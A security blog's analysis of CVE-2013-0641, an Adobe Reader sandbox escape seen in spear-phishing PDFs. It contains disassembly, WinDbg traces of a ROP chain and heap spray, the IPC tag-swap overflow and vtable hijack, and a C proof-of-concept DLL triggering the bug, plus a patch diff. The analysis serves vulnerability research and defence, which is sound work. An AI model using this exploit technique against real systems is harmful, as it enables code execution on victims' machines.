CVE-2013-0641, analysis of Acrobat Reader sandbox escape(en)

On 2013年02月22日, in 安全分析, by code_audit_labs

The vulnerability is caused due to the sandbox’s lpc channel function calls the buffer and size of w series function inconsistencies.

by instruder and binjo of code audit labs of vulnhunt.com

translate by xiaomin of code audit labs of vulnhunt.com

Acrobat Reader since the introduction of the sandbox function for its vulnerability attacks sharply reduce, signify the sandbox increase attack difficulty. But it does not mean that can’t be attacked, the recent spread attack that through spear phishing e-mail sent pdf attachments, is to use of two vulnerabilities. First use the xfa vulnerability rop shellcode to load the malicious dll, then use the sandbox vulnerabilities, in the broker process executed the final malicious code.

The entire escape process all in the D.T dll, load the dll after sandbox process triggered the xfa vulnerability by the shellcode

  1. Registered clipboard format by function RegisterClipboardFormatW, construct 0×80 dword, its value are all 0×8080020.
  2. Trigger the broker process to allocation memory size 0xC800000, layout the rop shellcode, at the same time, occupy memory near the 0×8080020 address.
  3. D.T construct and call lpc buffer of GetClipboardFormateNameA, change the lpc buffer corresponding to invoke tag becomes 0×73,it is invoke tag of GetClipboardFormateNameW, the broker process calls function GetClipboardFormatNameW to get format. Originally GetClipboardFormatNameW parameter buffer padding 0×42 of 0×9c size, and single-byte, but the actual length of the copy is 0×9c*2 size, so lead to cover the back function pointers.
  4. D.T construct and call the tag id 0xb0, finally, in the acrod32.exe address AcroRd32_0×9afda to control EIP, jump 0×808002c address to execute the shellcode, shellcode loaded L2P.T dll to complete the attack.

Register clipboard format

D.T registered a new clipboard format by user32!RegisterClipboardFormatW, structure data 0×08080020 (0×80 size) in format,(the address is pointer address of trigger the vulnerability function).

.text:10001D74 sub esp, 208h

.text:10001D7A xor eax, eax

.text:10001D7C

.text:10001D7C loc_10001D7C: ; CODE XREF:   register_clipfmt+1Cj

.text:10001D7C mov dword ptr [ebp+eax*4+szFormat],   8080020h

.text:10001D87 inc eax

.text:10001D88 cmp eax, 80h

.text:10001D8D jb short loc_10001D7C

…………………………………………………………………………………………………………………………

.text:10001E12

.text:10001E12 loc_10001E12: ; CODE XREF:   register_clipfmt+2Bj

.text:10001E12 lea eax, [ebp+szFormat]

.text:10001E18 push eax ; lpszFormat

.text:10001E19 call RegisterClipboardFormatW

There padding the wide character buffer.

Rop shellcode

Rop shellcode using clbcatq.dll pointer.

.text:10002B4D

.text:10002B4D pBuffer = byte ptr -400h ; shellcode   built within

.text:10002B4D var_380 = byte ptr -380h

.text:10002B4D arg_0 = dword ptr 8

.text:10002B4D

.text:10002B4D push ebp

.text:10002B4E mov ebp, esp

.text:10002B50 sub esp, 400h

.text:10002B56 push ebx

.text:10002B57 push esi

.text:10002B58 push edi

.text:10002B59 mov ebx, [ebp+arg_0]

.text:10002B5C push offset g_pszModName ; %temp%L2P.T

.text:10002B61 lea eax, [ebp+pBuffer] ; shellcode built   within

.text:10002B67 push eax

.text:10002B68 call build_rop_shellcode

ROP chain

0:007> dds ebp-400

1d44f3d4 41414141

1d44f3d8 41414141

1d44f3dc 41414141

1d44f3e0 41414141

1d44f3e4 41414141

1d44f3e8 41414141

1d44f3ec 41414141

1d44f3f0 41414141

1d44f3f4 760214eb CLBCatQ+0x14eb

1d44f3f8 760214eb CLBCatQ+0x14eb

1d44f3fc 76024527 CLBCatQ!GetCatalogObject2+0xe71

1d44f400 76051566   CLBCatQ!OpenComponentLibraryOnMemEx+0x22e9

1d44f404 760214eb CLBCatQ+0x14eb

1d44f408 760214eb CLBCatQ+0x14eb

1d44f40c 760214eb CLBCatQ+0x14eb

1d44f410 7647ef42 kernel32!LoadLibraryW

1d44f414 760214eb CLBCatQ+0x14eb

1d44f418 08080054

1d44f41c 7647c266 kernel32!Sleep

1d44f420 760214eb CLBCatQ+0x14eb

1d44f424 0036ee80

1d44f428 003a0043

1d44f42c 0055005c

1d44f430 00650073

1d44f434 00730072

1d44f438 0077005c

1d44f43c 006e0069

1d44f440 005c0037

1d44f444 00700041

1d44f448 00440070

1d44f44c 00740061

1d44f450 005c0061

0:007> du 1d44f428

1d44f428 "C:Userswin7AppDataLocalTemp"

1d44f468 "acrord32_sbxL2P.T"

Arrangement of the broker process shellcode memory layout

After composed rop shellcode spray in shared memory, size 0xc800000,thus filled in 0×08080020

void *__stdcall build_rop_buffer(int a1)

{

void *v1; // esi@1

void *i; // edi@1

char pBuffer; // [sp+Ch] [bp-400h]@1

char v5; // [sp+8Ch] [bp-380h]@1

build_rop_shellcode(&pBuffer, &g_pszModName);

v1 = (void *)sub_10003840(a1);

fill_sharemem(v1, &v5, 0x3E0u);

for ( i = (char *)v1 + 992; (char *)i + 1024 < (char   *)v1 + a1; i = (char *)i + 1024 )

fill_sharemem(i, &pBuffer, 0x400u);

return v1;

}

Sandbox process be called by tag 0×5D HttpSendRequestA, broker process check the call and read the corresponding content.

// sandbox process

0:007> bl

0 d 64461049 0001 (0001) 0:**** AcroForm+0x1049

1 e 649aa9be 0001 (0001) 0:****   AcroForm!DllUnregisterServer+0x3a639e

2 e 02942259 0001 (0001) 0:**** D+0x2259

3 e 02941c23 0001 (0001) 0:**** D+0x1c23

0:007> g

Breakpoint 3 hit

eax=0296d43c ebx=0000c161 ecx=00000000 edx=00000010   esi=00cc0018 edi=00000000

eip=02941c23 esp=1d44f780 ebp=1d44f7cc iopl=0 nv up ei   pl nz ac po nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000   efl=00000212

D+0x1c23:

02941c23 push offset D!initOLEcontainer+0x2b0b0   (0296d43c)

0:007> u

D+0x1c23:

02941c23 push offset D!initOLEcontainer+0x2b0b0   (0296d43c)

02941c28 call D+0x18a3 (029418a3) // lpc call

0:007> dd 0296d43c
0296d43c 0000005d 00000000 00000000 00000000
0296d44c 00000000 00000000 00000000 00000000
0296d45c 00000000 00000000 00000000 00000000
0296d46c 00000000 00000000 00000000 00000003
0296d47c 00000004 00000070 00000004 00000005
0296d48c 00000074 00000000 00000008 00000074
0296d49c 0000000c ffffffff 00000080 ffffffff
0296d4ac 00cc0020 000005f0 1daf0028 0c800000

0:007> db 1daf0028

1daf0028 4c 00 6f 00 63 00 61 00-6c 00 5c 00 54 00 65   00 L.o.c.a.l..T.e.

1daf0038 6d 00 70 00 5c 00 61 00-63 00 72 00 6f 00 72   00 m.p..a.c.r.o.r.

1daf0048 64 00 33 00 32 00 5f 00-73 00 62 00 78 00 5c   00 d.3.2._.s.b.x..

1daf0058 4c 00 32 00 50 00 2e 00-54 00 00 00 66 66 66   66 L.2.P...T...ffff

1daf0068 66 66 66 66 66 66 66 66-66 66 66 66 66 66 66   66 ffffffffffffffff

1daf0078 66 66 66 66 66 66 66 66-66 66 66 66 66 66 66   66 ffffffffffffffff

1daf0088 66 66 66 66 66 66 66 66-66 66 66 66 66 66 66   66 ffffffffffffffff

1daf0098 66 66 66 66 66 66 66 66-66 66 66 66 66 66 66   66 ffffffffffffffff

// broker process

0:012> bl

0 e 012ea515 0001 (0001) 0:**** AcroRd32+0x9a515

1 e 012e1ae0 0001 (0001) 0:**** AcroRd32+0x91ae0

0:012> g

Breakpoint 1 hit

eax=00cc0020 ebx=00000000 ecx=013a4940 edx=022d2960   esi=013a4940 edi=0000005d

eip=012e1ae0 esp=032ffb14 ebp=032ffb34 iopl=0 nv up ei   ng nz ac pe cy

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000   efl=00000297

AcroRd32+0x91ae0:

012e1ae0 push ebp

0:012>

eax=013fa6f4 ebx=02314838 ecx=000005f0 edx=00000001   esi=00000000 edi=0c800000

eip=012c82ab esp=032ffacc ebp=032ffae0 iopl=0 nv up ei   ng nz na pe cy

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000   efl=00000287

AcroRd32+0x782ab:

012c82ab push edi

0:012>

eax=013fa6f4 ebx=02314838 ecx=000005f0 edx=00000001   esi=00000000 edi=0c800000

eip=012c82ac esp=032ffac8 ebp=032ffae0 iopl=0 nv up ei   ng nz na pe cy

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000   efl=00000287

AcroRd32+0x782ac:

012c82ac call AcroRd32+0x282c1 (012782c1) //   new(0xc800000)

0:012>

eax=07ab0020 ebx=02314838 ecx=012782f0 edx=07ab0000   esi=00000000 edi=0c800000

eip=012c82b1 esp=032ffac8 ebp=032ffae0 iopl=0 nv up ei   pl nz na po nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000   efl=00000202

AcroRd32+0x782b1:

012c82b1 mov esi,eax

…………………………………..

0:012> d 07ab0020

07ab0020 00000000 00000000 00000000 00000000

07ab0030 00000000 00000000 00000000 00000000

07ab0040 00000000 00000000 00000000 00000000

07ab0050 00000000 00000000 00000000 00000000

07ab0060 00000000 00000000 00000000 00000000

07ab0070 00000000 00000000 00000000 00000000

07ab0080 00000000 00000000 00000000 00000000

07ab0090 00000000 00000000 00000000 00000000

0:012> p

eax=032ffba0 ebx=02314838 ecx=013fa6f4 edx=000001b4   esi=07ab0020 edi=0c800000

eip=012c82d4 esp=032ffabc ebp=032ffae0 iopl=0 nv up ei   pl nz na po nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000   efl=00000202

AcroRd32+0x782d4:

*** ERROR: Symbol file could not be found. Defaulted to   export symbols for C:Windowssystem32kernel32.dll -

012c82d4 call dword ptr [AcroRd32+0xe53b0 (013353b0)]   ds:0023:013353b0={kernel32!ReadProcessMemory (7646c7e3)}

0:012> p

eax=00000001 ebx=02314838 ecx=032ffadc edx=0c800000   esi=07ab0020 edi=0c800000

eip=012c82da esp=032ffad0 ebp=032ffae0 iopl=0 nv up ei   pl nz na po nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000   efl=00000202

AcroRd32+0x782da:

012c82da test eax,eax

0:012> d 07ab0020

07ab0020 006f004c 00610063 005c006c 00650054

07ab0030 0070006d 0061005c 00720063 0072006f

07ab0040 00330064 005f0032 00620073 005c0078

07ab0050 0032004c 002e0050 00000054 66666666

07ab0060 66666666 66666666 66666666 66666666

07ab0070 66666666 66666666 66666666 66666666

07ab0080 66666666 66666666 66666666 66666666

07ab0090 66666666 66666666 66666666 66666666

0:012> d 08080020

08080020 760214eb 760214eb 76024527 76051566

08080030 760214eb 760214eb 760214eb 7647ef42

08080040 760214eb 08080054 7647c266 760214eb

08080050 0036ee80 003a0043 0055005c 00650073

08080060 00730072 0077005c 006e0069 005c0037

08080070 00700041 00440070 00740061 005c0061

08080080 006f004c 00610063 005c006c 00650054

08080090 0070006d 0061005c 00720063 0072006f

overflow vulnerability trigger

After D.T arrangement the broker process memory layout, began to construct the lpc buffer GetClipboardFormateNameA function calls, specific function sub_10001E23.

.text:100022BE push 9Ch ; size for trigger

.text:100022C3 push ebx ; handle of registered   clipboard format name

.text:100022C4 call sub_10001E23

// sandbox process

0:007> bl

0 d 64461049 0001 (0001) 0:**** AcroForm+0x1049

1 e 649aa9be 0001 (0001) 0:****   AcroForm!DllUnregisterServer+0x3a639e

2 e 02942259 0001 (0001) 0:**** D+0x2259

3 e 02941c23 0001 (0001) 0:**** D+0x1c23

4 e 02941ea5 0001 (0001) 0:**** D+0x1ea5

0:007> g

Breakpoint 4 hit

eax=0296d43c ebx=0000c161 ecx=00000000 edx=000000a0   esi=0000c161 edi=0000009c

eip=02941ea5 esp=1d44f5bc ebp=1d44f7d0 iopl=0 nv up ei   pl nz na pe nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000   efl=00000206

D+0x1ea5:

02941ea5 push offset D!initOLEcontainer+0x2b0b0   (0296d43c)

0:007> u

D+0x1ea5:

02941ea5 push offset D!initOLEcontainer+0x2b0b0   (0296d43c)

02941eaa call D+0x18a3 (029418a3) // lpc call

02941eaf call D+0x1978 (02941978)

02941eb4 call D+0x1000 (02941000)

02941eb9 pop edi

02941eba pop esi

02941ebb mov esp,ebp

02941ebd pop ebp

0:007> dd 0296d43c —> IPC buffer
0296d43c 00000073 00000000 00000000 00000000 // tag id
0296d44c 00000000 00000000 00000000 00000000
0296d45c 00000000 00000000 00000000 00000000
0296d46c 00000000 00000000 00000000 00000002 // params_count
0296d47c 00000006 00000064 0000009c 00000002
0296d48c 00000100 00000004 ffffffff 00000104
0296d49c ffffffff 42424242 42424242 42424242
0296d4ac 42424242 42424242 42424242 42424242

structure

parameter structure

(ref BH_US_11_SabanalYason_Readerx_WP.pdf)

Tag id for GetClipboardFormatNameA API is 0×74, but malicious changes to 0×73, broker process does not check, for the broker process, the type of parameter corresponding function ANSI or UNICODE not known. Check the paramters and size consistency, began to call the specified functions by the tag, here call the GetClipboardFormatNameW function.

.text:0049A512 mov eax, [ebp+arg_4]

.text:0049A515 mov ecx, [eax]

.text:0049A517 mov eax, [eax+4]

.text:0049A51A push ebx

.text:0049A51B push esi

.text:0049A51C push ecx ; cchMaxCount

.text:0049A51D push eax ; lpszFormatName

.text:0049A51E mov eax, [ebp+format]

.text:0049A521 push eax ; format

.text:0049A522 xor bl, bl

.text:0049A524 call ds:GetClipboardFormatNameW

.text:0049A52A mov esi, eax

.text:0049A52C test esi, esi

.text:0049A52E jnz short loc_49A54C

Initial buffer is the size of 0×9c, incoming cchMaxCount is 0×9c,but the actual data size by user32!GetClipboardFormatNameW copied is 0×9c*2, so as to cover some of the key pointer of the subsequent buffer

// broker process
0:003> bp AcroRd32+0×9a515
0:003> g
ModLoad: 73390000 7339d000 C:Windowssystem32dhcpcsvc6.DLL
ModLoad: 75200000 75212000 C:Windowssystem32dhcpcsvc.DLL
ModLoad: 73da0000 73db6000 C:Windowssystem32MAPI32.DLL
Breakpoint 0 hit
eax=04544720 ebx=00000000 ecx=013a34c8 edx=04544720 esi=013a34c8 edi=0316f80c
eip=012ea515 esp=01aff8f4 ebp=01aff8f8 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
AcroRd32+0×9a515:
012ea515 mov ecx,dword ptr [eax] ds:0023:04544720=0000009c
0:003> dd eax l2
04544720 0000009c 0454a5e4
0:003> db 0454a5e4 l9c+20
0454a5e4 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
0454a5f4 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
0454a604 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
0454a614 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
0454a624 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
0454a634 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
0454a644 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
0454a654 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
0454a664 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
0454a674 42 42 42 42 42 42 42 42-42 42 42 42 61 c1 00 00 BBBBBBBBBBBBa…
0454a684 00 00 00 00 00 00 00 00-00 00 00 00 05 91 ce 0b …………….
0454a694 00 00 00 94 50 9b 35 01-00 00 da 73 ….P.5….s

// overflow after calling GetClipboardFormatNameW

0:003> db 0454a5e4 l9c+20
0454a5e4 20 00 08 08 20 00 08 08-20 00 08 08 20 00 08 08 … … … …
0454a5f4 20 00 08 08 20 00 08 08-20 00 08 08 20 00 08 08 … … … …
0454a604 20 00 08 08 20 00 08 08-20 00 08 08 20 00 08 08 … … … …
0454a614 20 00 08 08 20 00 08 08-20 00 08 08 20 00 08 08 … … … …
0454a624 20 00 08 08 20 00 08 08-20 00 08 08 20 00 08 08 … … … …
0454a634 20 00 08 08 20 00 08 08-20 00 08 08 20 00 08 08 … … … …
0454a644 20 00 08 08 20 00 08 08-20 00 08 08 20 00 08 08 … … … …
0454a654 20 00 08 08 20 00 08 08-20 00 08 08 20 00 08 08 … … … …
0454a664 20 00 08 08 20 00 08 08-20 00 08 08 20 00 08 08 … … … …
0454a674 20 00 08 08 20 00 08 08-20 00 08 08 20 00 08 08 … … … …
0454a684 20 00 08 08 20 00 08 08-20 00 08 08 20 00 08 08 … … … …
0454a694 20 00 08 08 20 00 08 08-20 00 08 08 … … … // 0×01359b50 vtable overflowed

Execute shellcode

D.T overflow critical data, call the tag id(0xb0) again, trigger to call an object of previously arrangement.

// sandbox process

0:007> bp 02942099

0:007> g

Breakpoint 4 hit

eax=0296d43c ebx=0000c161 ecx=00000000 edx=00000004   esi=000003ea edi=000003ea

eip=02942099 esp=1d44f7c4 ebp=1d44f7d4 iopl=0 nv up ei   pl nz ac pe nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000   efl=00000216

D+0x2099:

02942099 call D+0x18a3 (029418a3)

0:007> dd 0296d43c

0296d43c 000000b0 00000000 00000000 00000000

0296d44c 00000000 00000000 00000000 00000000

0296d45c 00000000 00000000 00000000 00000000

0296d46c 00000000 00000000 00000000 00000001

0296d47c 00000002 00000058 00000004 ffffffff

0296d48c 0000005c ffffffff 000003ea 00000000

0296d49c 00000000 00000000 00000000 00000000

0296d4ac 00000000 00000000 00000000 00000000

// broker process

0:013> bp acrord32+9af80

0:013> g

eax=019bfc64 ebx=0277f994 ecx=013a2144 edx=08080020   esi=013a2144 edi=0454a698

eip=012eafd3 esp=019bfc50 ebp=019bfc5c iopl=0 nv up ei   pl nz na po nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000   efl=00000202

AcroRd32+0x9afd3:

012eafd3 mov eax,dword ptr [edx+0Ch]   ds:0023:0808002c=76051566

0:002> ub

AcroRd32+0x9afc1:

012eafc1 push eax

012eafc2 lea eax,[ebp+8]

012eafc5 push eax

012eafc6 mov ecx,esi

012eafc8 call AcroRd32+0xd34b0 (013234b0)

012eafcd test edi,edi

012eafcf je AcroRd32+0x9afdc (012eafdc)

012eafd1 mov edx,dword ptr [edi] // edi points to fake   vtable, 0x08080020

0:002> u

AcroRd32+0x9afd3:

012eafd3 mov eax,dword ptr [edx+0Ch] // edx under control

012eafd6 push 1

012eafd8 mov ecx,edi

012eafda call eax // rop stackpivot

0:002> p

eax=76051566 ebx=0277f994 ecx=013a2144 edx=08080020   esi=013a2144 edi=0454a698

eip=012eafd6 esp=019bfc50 ebp=019bfc5c iopl=0 nv up ei   pl nz na po nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000   efl=00000202

AcroRd32+0x9afd6:

012eafd6 push 1

0:002>

eax=76051566 ebx=0277f994 ecx=013a2144 edx=08080020   esi=013a2144 edi=0454a698

eip=012eafd8 esp=019bfc4c ebp=019bfc5c iopl=0 nv up ei   pl nz na po nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000   efl=00000202

AcroRd32+0x9afd8:

012eafd8 mov ecx,edi

0:002>

eax=76051566 ebx=0277f994 ecx=0454a698 edx=08080020   esi=013a2144 edi=0454a698

eip=012eafda esp=019bfc4c ebp=019bfc5c iopl=0 nv up ei   pl nz na po nc

cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000   efl=00000202

AcroRd32+0x9afda:

012eafda call eax {CLBCatQ!RegMeta::SetHandler+0x16   (76051566)}

0:002> u 76051566

*** ERROR: Symbol file could not be found. Defaulted to   export symbols for C:Windowssystem32CLBCatQ.DLL -

CLBCatQ!OpenComponentLibraryOnMemEx+0x22e9: ---------》start rop

76051566 push edx

76051567 pop esp

76051568 pop ebp

76051569 ret 8

Broke process only checks the consistency of the parameter buffer and the corresponding size, does not take into the buffer and size of W series function is not consistent, but double relationship, leading to the original call A series functions malicious call into W series function, so caused the vulnerability.

demo example

#include "stdafx.h"

#pragma comment(lib,"user32.lib")

char szFA[0x9c];

void pass_sandbox()

{

WCHAR   szFB[0x81*2]=L"eeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc";

unsigned int error_code1=0;

UINT result = RegisterClipboardFormatW((LPCWSTR)szFB);

if (result==0)

{

error_code1=GetLastError();

return ;

}

memset(szFA,0x45,0x9c);

GetClipboardFormatNameA(result,szFA,0x9c);//change the tag   into  0x73 before send the lpc buffer

}

BOOL APIENTRY DllMain( HMODULE hModule,

DWORD ul_reason_for_call,

LPVOID lpReserved

)

{

switch (ul_reason_for_call)

{

case DLL_PROCESS_ATTACH:

pass_sandbox();

case DLL_THREAD_ATTACH:

case DLL_THREAD_DETACH:

case DLL_PROCESS_DETACH:

break;

}

return TRUE;

}

Patch

Adobe has launched the patch, we compare and find when processing the GetClipboardFormatNameW callback, tag 0×73 processed the incoming cchMaxCount parameter. As follows:

.text:00496432 mov ecx, [ebp+arg_4]

.text:00496435 mov eax, [ecx]

.text:00496437 mov ecx, [ecx+4]

.text:0049643A push ebx

.text:0049643B push esi

.text:0049643C shr eax, 1 ; size / 2

.text:0049643E push eax ; cchMaxCount

.text:0049643F mov eax, [ebp+format]

.text:00496442 push ecx ; lpszFormatName

.text:00496443 push eax ; format

.text:00496444 xor bl, bl

.text:00496446 call ds:GetClipboardFormatNameW

The patch seems a problem, originally needed wide byte format of 0×9c length, after rigid length /2, can only get the wide byte format of 0×9c/2 length

Summary

This paper only analysis the escape vulnerability of sandbox, marvel the exploit author well aware of internal structure of pdf and sandbox

Welcome criticism testify ,thank you!

How to detect

Xingyun next generation network threat detection platform of vulnhunt use no signature algorithm, recognized users of xingyun don’t need to update any signatures can detect the attack.

parameter

  1. http://media.blackhat.com/bh-us-11/Sabanal/BH_US_11_SabanalYason_Readerx_WP.pdf
  2. https://media.blackhat.com/bh-eu-12/Liu_Lovet/bh-eu-12-Liu_Lovet-Sandworms-Slides.pdf
Tagged with:  

Comments are closed.